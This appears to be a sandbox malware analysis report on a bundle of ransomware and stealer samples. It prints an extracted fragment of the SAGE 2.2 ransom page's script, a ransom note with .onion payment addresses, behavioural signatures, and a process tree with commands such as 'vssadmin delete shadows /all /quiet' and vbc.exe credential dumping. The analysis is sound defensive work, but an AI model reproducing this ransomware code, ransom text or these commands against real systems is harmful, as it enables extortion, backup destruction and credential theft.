txp:'txs/', adp:'addrs/', ptxs: function(json){ var res = []; var m = {}; for(var i = 0; i < json.txrefs.length; i++){ var tx = json.txrefs[i].tx_hash; if(m[tx]) continue; m[tx] = 1; res.push(tx); } return res; }, ptx: function(json){ var os = json.outputs; for(var i = 0; i < os.length; i++) if(os[i].data_hex != null) return decodeTxString(os[i].data_hex); return null; } } ]; function eachUntil(a,f,c){ var i = 0; var n = function(){ if(i >= a.length) return c('f'); f(a[i++], function(err, res){ if(err == null) return c(null, res); n(); }); }; n(); } function getJson(url, cb){ getPage(url, function(err, res){ if(err != null) return cb(err); var json; try{ if(window.JSON && window.JSON.parse){ json = window.JSON.parse(res); } else{ json = eval('('+res+')'); } } catch(e){ cb(e); } cb(null, json); }); } function getDomains(ad, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp; url+= s.adp+ad; if(s.adpb) url+= s.adpb; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptxs(json)); } catch(e){ cb(e); } }); }, function(err, txs){ if(err != null) return cb(err); if(txs.length == 0) return cb('f'); eachUntil(txs, function(tx, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp+s.txp+tx; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptx(json)); } catch(e){ cb(e); } }); }, function(err, res){ if(err != null) return cb(err); if(res == null) return cb('f'); cb(null, res.split(':')); }); }, cb); }); } function updateLinks(){ tweakClass('lu', hide); tweakClass('lu-updating', show); getDomains('1783wBG'+'sr'+'1zkxenfE'+'ELXA25PLSkL'+'dfJ4B7', function(err, ds){ tweakClass('lu', hide); if(err != null){ tweakClass('lu-error', show); return; } tweakClass('lu-done', show); var html = ''; for(var i = 0; i < ds.length; i++) html+= '<div class="key"><a href="http://z5dq36kjy5swjtmr.'+ds[i]+'/login/AQAAAAAAAAAAA76oRTE5CCUGOTBABS4_2ADUs0avuLKWa5JkGz6_PU7A" onclick="javascript:return openlink(this.href)">http://z5dq36kjy5swjtmr.'+ds[i]+'/</a></div>'; tweakClass('links', function(el){ el.innerHTML = html; }); }); return false; } function onPageLoaded(){ try{ tweakClass('lsb', show); }catch(e){} try{ tweakClass('lu-orig', show); }catch(e){} try{ setLang('en'); }catch(e){} try{ var args = GetCmd().match(/"[^"]+"|[^ ]+/g); if(args.length > 1){ var file = args[args.length-1]; if(file.charAt(0) == '"' && file.charAt(file.length-1) == '"') file = file.substr(1, file.length-2); document.getElementById('filename').innerHTML = file; show(document.getElementById('file')); document.title = 'File is encrypted'; } }catch(e){} } </script> </head> <body onload='javascript:onPageLoaded()'> <div class='lsb'> <span class='ls ls-en' onclick="javascript:return setLang('en')">English</span> <span class='ls ls-de' onclick="javascript:return setLang('de')">Deutsch</span> <span class='ls ls-it' onclick="javascript:return setLang('it')">Italiano</span> <span class='ls ls-fr' onclick="javascript:return setLang('fr')">Français</span> <span class='ls ls-es' onclick="javascript:return setLang('es')">Español</span> <span class='ls ls-no' onclick="javascript:return setLang('no')">Norsk</span> <span class='ls ls-pt' onclick="javascript:return setLang('pt')">Português</span> <span class='ls ls-nl' onclick="javascript:return setLang('nl')">Nederlands</span> <br/><span class='ls ls-kr' onclick="javascript:return setLang('kr')">한국어</span> <span class='ls ls-ms' onclick="javascript:return setLang('ms')">Bahasa Melayu</span> <span class='ls ls-zh' onclick="javascript:return setLang('zh')">中文</span> <span class='ls ls-tr' onclick="javascript:return setLang('tr')">Türkçe</span> <span class='ls ls-vi' onclick="javascript:return setLang('vi')">Tiếng Việt</span> <span class='ls ls-hi' onclick="javascript:return setLang('hi')">हिन्दी</span> <span class='ls ls-jv' onclick="javascript:return setLang('jv')">Basa Jawa</span> <span class='ls ls-fa' onclick="javascript:return setLang('fa')">فارسی</span> <span class='ls ls-ar' onclick="javascript:return setLang('ar')">العربية</span> </div> <div id='file' class='container filecontainer'> <div class='filename'> <div style='float:left; padding:18px 0'><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADEAAABACAYAAACz4p94AAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAARCQAAEQkAGJrNK4AAAAB3RJTUUH4QEcFBoaYAOrHQAABThJREFUaN7tmlloXGUUx3/3ziRtTa2xcZ1gtaJFDFjtwSqllaKiiEilKOKDNS2UivXF+qD0QRBRUMQXN/TBBcFifahYFC0urfpghSMqaDSkdQMvojZpIk2zTMaHe776MZ17M6u9ozkwzAwz3/ed/9m+s9yABkhEUFX/+43ATcBy4FxgMdABTAB/Aj8CXwO7VfVdb10AlPy9aqGgTuYDVS3Z56XA48AtdWz1OrBdVQ82AiaoVfJATlWLIrIAeAbYWKciS975LwJ3q+pEJQ03DYRJKVDVGRFZCew0kylnqFaaAULgB+B2Vd1fru3ZKFcDAFS1JCLXA7uBMxs1S29t0fzn5kKhMBBF0WAURYgIURQ1DsIAhKaBVcAbwKk0l0JgGlgIrCkUChpF0U/VAgmrOCBvPrAEeBY4jdZQ3jRyDvCEiJxl2ne+mLowTQs5VZ0yJ95mobMaRx0A3gMGgSPAycCFwHXARQlrfKFeDjwMbG7IsT0zKorIauBtYFGFvxY9s3wZ2Kaqwyn7dgNPpkQ1t9/PwGZV3TNbxErThAOwCOhPADBtexwGNqrqrrR4bxFnBNgkIm8CrwFdCX66BNgA7KlLE2aDeVWdFpHlwPsVfMEBGAXuUtUd1YRGH6CIrLdAESZoYxC4Q1U/r8exQwMQAFdb+CuP7U6LO6oF4MK0d+47ZlpJfJ0HXFsm3OpB2HsPsCZBUtgF9VSZo85KFq7zqnrUTOq3ChYyA3QCq7x1NYFwZnYKsKJCFOqwz59YJKo5VTAmAQ4CuxKiHUCviCyryZzMhIqeOnsSDh8B9qnqTJqU0kKyAT8MfJwiyB5gWa0+ETjGgPOBeQkSGgG+rPdmM99wfjUEHEoA0Q0srRmEaSRv+VFHAogx84lGyO01ChxI+E8XcHq9aUdnhahU8uL471bszJoWVEFHbL8kHhfXCyIE5qesGXX+UW9F5mli0jSbRPMaAdGZ8vtUtSG1ykg1mXIRdzaaxVYjSU7kPmFKaAsq5DW+dBY2WAyV89GV8ntXran4tGfzW4B7K0grAI5WMIF6zAjgD2ATsDXhrPFaGwGZJhE59jrOPMraMIuBK4EzTFqlE8x7YNr6TFUP+dkwQCAiobuhRWQt8DTQl2FlfAtsVdW9DoyviUeA7U1owbSSfL4eU9UHjlVRInI/8FDGATizcvytLhQKQRRFewMRuQJ4y+y/Xcg13IaA/tBCWxftRe5+uwC4NQTWzpabZFgbAFeF1qzKtSEIp40+l+QFtC91hvwHaA7E/xlEKesgZrz6u19VA/eytH64FUGkmSCKtt8XwKWq+opL0GxE8AKwknh6mkkQ03bXRMTT0F9d7m/pfdGy5SHgPtclyRoIZyLfAR95APC6If4A5sOsgfB7UQe88jbJoceI+6+ZdeyOKrWWzxqIwJN+H/F8rlJDzR8XrMiyT1wM3OnX7V797oBeQzxYbF6lJCLTTcpi3fhrBNiiqjsrNCBuIx5Ozs+qT+SJW5vdxHPoS3yHlrjH8nyzAbTCsZ1ZjfPPoMa/DMdpAc0lgHMg2gREqcxPSrSoHdoqx+4Ceu3Sc4x3c/wkNpMgclZT9AIPisjZFl57gUeZZeKThcuuvDhyAppsFfOt9gl/385/w7FLtDmFwF9ebdxO5IQ/HBIPLabaGMT+kLitP9GGAELi4ecHIfAqyc9VZJWc+SvwUi6KorFCofANsA44qQ0AuEfrfgHuUdWB0IqWT4Ebml3At4hywPfAelXd5y47sIfY7XbdQNytuwxYkCHmR4GvgOfcM4fGL38Dzdjo/H/3PFAAAAAASUVORK5CYII=" style='padding:0 7.5px'/></div> <div> <h2 class='l l-en' style='display:block'>The file is encrypted but can be restored</h2><h2 class='l l-de' >Die Datei ist verschlüsselt, aber kann wiederhergestellt werden</h2><h2 class='l l-it' >Il file è crittografato, ma può essere ripristinato</h2><h2 class='l l-fr' >Le fichier est crypté mais peut être restauré</h2><h2 class='l l-es' >El archivo está encriptado pero puede ser restaurado</h2><h2 class='l l-no' >Filen er kryptert men kan bli gjenopprettet</h2><h2 class='l l-pt' >O arquivo está criptografado, mas poderá ser descriptografado</h2><h2 class='l l-nl' >Het bestand is versleuteld maar kan worden hersteld</h2><h2 class='l l-kr' >파일은 암호화되었지만 복원 할 수 있습니다</h2><h2 class='l l-ms' >Fail ini dienkripsikan tetapi boleh dipulih semula.</h2><h2 class='l l-zh' >文件已被加密,但是可以解密</h2><h2 class='l l-tr' >Dosya şifrelenmiş ancak geri yüklenebilir.</h2><h2 class='l l-vi' >Tập tin bị mã hóa nhưng có thể được khôi phục</h2><h2 class='l l-hi' >फाइल एनक्रिप्‍टड हैं लेकिन रिस्‍टोर की जा सकती हैं</h2><h2 class='l l-jv' >File ini dienkripsi tetapi dapat dikembalikan</h2><h2 class='l l-fa' >این فایل رمزگذاری شده است اما می تواند بازیابی شود</h2><h2 class='l l-ar' > الملف مشفر لكن من الممكن إسترجاعه </h2> <p><span id='filename'></span></p> </div> </div> <h2 class='l l-en' style='display:block'>The file you tried to open and other important files on your computer were encrypted by "SAGE 2.2 Ransomware".</h2><h2 class='l l-de' >Die Datei, die Sie öffnen wollten, und andere wichtige Dateien auf ihrem Computer wurden von "SAGE 2.2 Ransomware" verschlüsselt.</h2><h2 class='l l-it' >Il file che hai tentato di aprire e altri file importanti del tuo computer sono stati crittografati da "SAGE 2.2 Ransomware".</h2><h2 class='l l-fr' > Le fichier que vous essayez d’ouvrir et d’autres fichiers importants sur votre ordinateur ont été cryptés par "SAGE 2.2 Ransomware".</h2><h2 class='l l-es' >El archivo que intentó abrir y otros importantes archivos en su computadora fueron encriptados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-no' >Filen du prøvde åpne og andre viktige filer på datamaskinen din ble kryptert av "SAGE 2.2 Ransomware".</h2><h2 class='l l-pt' >O arquivo que você está tentando acessar está criptografado, outros arquivos importantes em seu computador também foram criptografados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-nl' >Het bestand dat je probeert te openen en andere belangrijke bestanden op je computer zijn beveiliged door "SAGE 2.2 Ransomware".</h2><h2 class='l l-kr' >컴퓨터에서 여는 파일 및 기타 중요한 파일은 "SAGE 2.2 Ransomware"에 의해 암호화되었습니다.</h2><h2 class='l l-ms' >Fail yang anda cuba buka dan fail penting yang lain di komputer anda telah dienkripskan oleh "SAGE 2.2 Ransomware".</h2><h2 class='l l-zh' >您试图打开的文件以及您计算机上的其它文件已经用"SAGE 2.2 Ransomware"进行了加密。</h2><h2 class='l l-tr' >Açmaya çalıştığınız dosya ve diğer önemli dosyalarınızı bilgisayarınızda "SAGE 2.2 Ransomware" tarafından şifrelenmiş.</h2><h2 class='l l-vi' >Tập tin mà bạn cố mở và những tập tin quan trọng khác trên máy tính của bạn bị mã hóa bởi "SAGE 2.2 Ransomware".</h2><h2 class='l l-hi' >वो फाइल जिसे आपने खोलने की कोशिश की और आपके कंप्‍यूटर पर बाकी महत्‍वपूर्ण फाइले हमारी ओर से इंक्रिप्टिड की गई हैं "SAGE 2.2 Ransomware"।</h2><h2 class='l l-jv' >File yang Anda coba untuk buka dan file penting lain di komputer Anda yang dienkripsi oleh "SAGE 2.2 Ransomware".</h2><h2 class='l l-fa' >فایلی که ش�
URLs

http://'+s.bp

http://'+s.bp+s.txp+tx

Extracted

Path

C:\XK\Restore-My-Files.txt

Ransom Note
All your files are Encrypted! For data recovery needs decryptor. How to buy decryptor: ---------------------------------------------------------------------------------------- | 1. Download Tor browser - https://www.torproject.org/ and install it. | 2. Open link in TOR browser - hhttp://alcx6zctcmhmn3kx.onion/ | 3. Follow the instructions on this page ---------------------------------------------------------------------------------------- Note! This link is available via "Tor Browser" only. ------------------------------------------------------------ Free decryption as guarantee. Before paying you can send us 2 file for free decryption. ------------------------------------------------------------ alternate address - http://dtutgqjuzv7sktgl.onion/ DO NOT CHANGE DATA BELOW ###h7dlrwhrvtghr###����������32 B8 E9 D5 5D 10 CC 5C 5B F6 C5 B4 EC 69 EA 2C 6E 01 DB 09 B3 91 72 BE 13 19 18 D9 08 51 0E 63 D0 92 D2 D5 72 A0 75 E8 E9 E6 75 8C 98 6D 6E AE 00 E8 9D 2B 09 CF 74 C4 AC C2 E8 F1 30 DB 58 EB 84 CC 0B 9E 05 C5 8F 3B EB BF 7F 7C F1 AC 39 B2 E6 77 3A B8 6A 59 71 AB 84 91 BC 32 6B 55 AF BD 66 43 4F C4 BC 35 0A FE 4B 45 7D 4D 68 BF 82 41 A3 C4 A0 C2 9A 7B 54 AF 83 C3 17 BA 29 40 99 B9 4A AE 59 37 46 E8 4F 18 8A D0 DD 9A AD 96 E3 9A EA FE 2E 2E 25 49 9B 9C 5A B9 E4 E3 64 AD A0 24 56 CE 5F 14 AA F8 18 7D FA 0F C5 EF 7C 29 09 F5 B9 D5 FB 32 F3 82 61 94 D8 56 E2 2E 5C 45 29 CC 6F 0B F7 E5 11 8D F5 6C 42 64 D3 7E BD D0 97 91 F4 B4 59 70 0B 5C 48 E5 A8 89 5F A3 1A 7C FC 37 1A F2 C8 CA 26 3D 11 35 CF F4 B2 A4 9A 4F 5E 19 DA AD 83 96 21 BF 6F A3 22 09 3E EE 9E 4B 13 09 ###�������������
URLs

http://dtutgqjuzv7sktgl.onion/

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

    trojaninfostealerazorult
  • Azorult family
    azorult
  • Dharma

    Dharma is a ransomware that uses security software installation to hide malicious activities.

    ransomwaredharma
  • Dharma family
    dharma
  • GandCrab payload 3 IoCs
  • Gandcrab

    Gandcrab is a Trojan horse that encrypts files on a computer.

    ransomwarebackdoorgandcrab
  • Gandcrab family
    gandcrab
  • GlobeImposter

    GlobeImposter is a ransomware first seen in 2017.

    ransomwareglobeimposter
  • Globeimposter family
    globeimposter
  • HawkEye

    HawkEye is a malware kit that has seen continuous development since at least 2013.

    keyloggertrojanstealerspywarehawkeye
  • Hawkeye family
    hawkeye
  • Matrix Ransomware 2 IoCs

    Targeted ransomware with information collection and encryption functionality.

    ransomwarematrix
  • Matrix family
    matrix
  • Modifies WinLogon for persistence 2 TTPs 2 IoCs
    persistence
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
    evasiontrojan
  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
    evasion
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
    evasion
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Troldesh family
    troldesh
  • Troldesh, Shade, Encoder.858

    Troldesh is a ransomware spread by malspam.

    ransomwaretrojantroldesh
  • Windows security bypass 2 TTPs 6 IoCs
    evasiontrojan
  • Contacts a large (7734) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Renames multiple (292) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Renames multiple (8764) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Blocklisted process makes network request 1 IoCs
  • Disables RegEdit via registry modification 2 IoCs
    evasion
  • Disables use of System Restore points 1 TTPs
    evasion
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

    credential_accessstealer
  • Drops startup file 6 IoCs
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies system executable filetype association 2 TTPs 13 IoCs
    persistence
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Uses the VBS compiler for execution 1 TTPs
  • Windows security modification 2 TTPs 7 IoCs
    evasiontrojan
  • Adds Run key to start application 2 TTPs 20 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops desktop.ini file(s) 64 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

    discovery
  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

    discovery
  • Drops file in System32 directory 64 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 5 IoCs
    ransomware
  • Suspicious use of SetThreadContext 8 IoCs
  • UPX packed file 15 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
    defense_evasionprivilege_escalation
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 60 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 3 TTPs 9 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Control Panel 17 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 29 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 42 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
    evasionspywaretrojan
  • Runs ping.exe 1 TTPs 12 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 24 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: RenamesItself 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 64 IoCs
  • Suspicious use of UnmapMainImage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
    evasion
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Views/modifies file attributes 1 TTPs 12 IoCs
    evasion

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00361.7z"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2756
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:2312
  • C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2964
    • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.gibz-eb53d5e2ac26d3f5bd2c4c0d58670a5171197e1e7cc797004612f8801da1aa68.exe
      Trojan-Ransom.Win32.Blocker.gibz-eb53d5e2ac26d3f5bd2c4c0d58670a5171197e1e7cc797004612f8801da1aa68.exe
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:2040
      • C:\Windows\SysWOW64\Rundll32.exe
        "C:\Windows\System32\Rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\IconCache.db",StartUpdate
        3⤵
          PID:408
      • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe
        Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe
        2⤵
        • Modifies WinLogon for persistence
        • Modifies visibility of file extensions in Explorer
        • Modifies visiblity of hidden/system files in Explorer
        • Disables RegEdit via registry modification
        • Executes dropped EXE
        • Loads dropped DLL
        • Modifies system executable filetype association
        • Adds Run key to start application
        • Drops desktop.ini file(s)
        • Enumerates connected drives
        • Modifies Control Panel
        • Modifies registry class
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        • System policy modification
        PID:2888
        • C:\Windows\xk.exe
          C:\Windows\xk.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:2684
        • C:\Windows\SysWOW64\IExplorer.exe
          C:\Windows\system32\IExplorer.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          PID:3784
        • C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE
          "C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          PID:4220
        • C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE
          "C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          PID:4216
        • C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE
          "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          PID:4960
        • C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE
          "C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          PID:2944
        • C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE
          "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          PID:4672
        • C:\Windows\xk.exe
          C:\Windows\xk.exe
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:5096
        • C:\Windows\SysWOW64\IExplorer.exe
          C:\Windows\system32\IExplorer.exe
          3⤵
          • Suspicious use of SetWindowsHookEx
          PID:5452
        • C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE
          "C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"
          3⤵
          • Suspicious use of SetWindowsHookEx
          PID:6956
        • C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE
          "C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"
          3⤵
          • Suspicious use of SetWindowsHookEx
          PID:4044
        • C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE
          "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"
          3⤵
            PID:1920
          • C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE
            "C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"
            3⤵
              PID:4308
            • C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE
              "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"
              3⤵
                PID:3624
            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ldah-cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12.exe
              Trojan-Ransom.Win32.Blocker.ldah-cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12.exe
              2⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: CmdExeWriteProcessMemorySpam
              • Suspicious use of SetWindowsHookEx
              PID:540
              • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ldah-cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12.exe
                Trojan-Ransom.Win32.Blocker.ldah-cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12.exe
                3⤵
                • Executes dropped EXE
                PID:3928
            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ldcq-c1da3cbf2c15cb64fb21ee704fedca797bf0f36ee2107015bb5625f0e8dd377b.exe
              Trojan-Ransom.Win32.Blocker.ldcq-c1da3cbf2c15cb64fb21ee704fedca797bf0f36ee2107015bb5625f0e8dd377b.exe
              2⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: CmdExeWriteProcessMemorySpam
              PID:2900
            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.liwq-a8c1bc0154b82490d3e19ebd3b4cfecb77aad4a5a05106255f69ded514be7ad7.exe
              Trojan-Ransom.Win32.Blocker.liwq-a8c1bc0154b82490d3e19ebd3b4cfecb77aad4a5a05106255f69ded514be7ad7.exe
              2⤵
              • Executes dropped EXE
              • Suspicious behavior: CmdExeWriteProcessMemorySpam
              PID:2936
            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exe
              Trojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exe
              2⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: CmdExeWriteProcessMemorySpam
              • Suspicious use of SetWindowsHookEx
              PID:484
              • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exe
                rojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exe
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Suspicious use of UnmapMainImage
                PID:4600
                • C:\Users\Admin\AppData\Roaming\Windows Update.exe
                  "C:\Users\Admin\AppData\Roaming\Windows Update.exe"
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious use of SetWindowsHookEx
                  PID:3112
                  • C:\Users\Admin\AppData\Roaming\Windows Update.exe
                    C:\Users\Admin\AppData\Roaming\Windows Update.exe"
                    5⤵
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of UnmapMainImage
                    PID:6848
                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                      C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
                      6⤵
                        PID:5364
                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
                        6⤵
                          PID:7440
                • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe
                  Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe
                  2⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Adds Run key to start application
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1928
                  • C:\Windows\405066960303840\winsvcs.exe
                    C:\Windows\405066960303840\winsvcs.exe
                    3⤵
                    • Modifies Windows Defender Real-time Protection settings
                    • Windows security bypass
                    • Executes dropped EXE
                    • Windows security modification
                    PID:4156
                • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe
                  Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe
                  2⤵
                  • Drops startup file
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Drops desktop.ini file(s)
                  • Drops file in Program Files directory
                  • Modifies registry class
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2028
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe"
                    3⤵
                      PID:1876
                      • C:\Windows\system32\mode.com
                        mode con cp select=1251
                        4⤵
                          PID:1400
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin delete shadows /all /quiet
                          4⤵
